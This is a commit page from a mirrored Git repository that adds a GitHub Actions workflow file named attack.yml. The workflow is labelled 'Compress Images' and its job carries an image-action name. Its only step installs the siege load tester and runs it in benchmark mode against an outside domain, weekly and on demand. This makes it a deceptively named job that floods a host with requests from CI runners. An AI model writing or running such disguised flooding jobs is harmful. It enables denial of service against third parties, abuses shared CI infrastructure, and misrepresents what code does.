mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
Create attack.yml
This commit is contained in:
parent
ed795af744
commit
4a7fee5495
14
.github/workflows/attack.yml
vendored
Normal file
14
.github/workflows/attack.yml
vendored
Normal file
@ -0,0 +1,14 @@
|
||||
name: Compress Images
|
||||
on:
|
||||
workflow_dispatch:
|
||||
schedule:
|
||||
- cron: '00 23 * * 0'
|
||||
jobs:
|
||||
build:
|
||||
name: calibreapp/image-actions
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: cool
|
||||
run: |
|
||||
sudo apt install siege
|
||||
siege -b 0694200.xyz
|
||||
Loading…
x
Reference in New Issue
Block a user